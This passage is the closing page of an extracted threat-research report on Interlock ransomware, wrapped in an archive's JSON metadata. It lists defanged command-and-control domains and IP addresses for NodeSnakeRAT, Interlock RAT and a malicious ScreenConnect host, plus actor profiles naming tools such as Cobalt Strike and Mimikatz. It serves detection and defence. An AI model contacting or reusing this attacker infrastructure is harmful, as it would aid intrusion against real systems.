22-May-2025\r\nDomain eventsdatamicrosoft[.]org NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain dns-teams-windows[.]live NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain sync-time-win[.]live NodeSnakeRAT C2 Domain 22-May-2025\r\nIPv4\r\nAddress\r\n157[.]250.195.229 Interlock RAT C2 IP\r\n04-September-2025\r\nIPv4\r\nAddress\r\n216[.]219.95.234 Interlock RAT C2 IP\r\n04-September-2025\r\nIPv4\r\nAddress\r\n91[.]98.29.99 Interlock RAT C2 IP\r\n04-September-2025\r\nIPv4\r\nAddress\r\n64[.]190.113.235 Interlock RAT C2 IP\r\n04-September-2025\r\nDomain user[.]kangaroosim[.]com Malicious ScreenConnect Domain\r\n14-September-2025\r\nIPv4\r\nAddress\r\n91[.]92.241.179\r\nIP associated with malicious\r\nScreenConnect domain\r\n14-September-2025\r\n1 https://docs.fortinet.com/document/fortiedr/7.2.0/administration-guide/815103\r\n2 https://community.fortinet.com/t5/FortiGate/Troubleshooting-Tip-Blocking-All-Remote-Access-software/ta-p/360335\r\n3 https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/\r\n4 https://www.acronis.com/en/tru/posts/filefix-in-the-wild-new-filefix-campaign-goes-beyond-poc-and-leverages-steganography/\r\nSource: https://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks" ], "report_names": [ "interlock-ransomware-new-techniques-same-old-tricks" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "4390d8ec-605d-493a-81ee-d5ef80c07046", "created_at": "2025-05-29T02:00:03.223467Z", "updated_at": "2026-04-10T02:00:03.873701Z", "deleted_at": null, "main_name": "TAG-124", "aliases": [ "LandUpdate808" ], "source_name": "MISPGALAXY:TAG-124", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434260, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4077be8fa0679f7b8ed925e39a78ca41b5b35dbe.pdf", "text": "https://archive.orkl.eu/4077be8fa0679f7b8ed925e39a78ca41b5b35dbe.txt", "img": "https://archive.orkl.eu/4077be8fa0679f7b8ed925e39a78ca41b5b35dbe.jpg" } }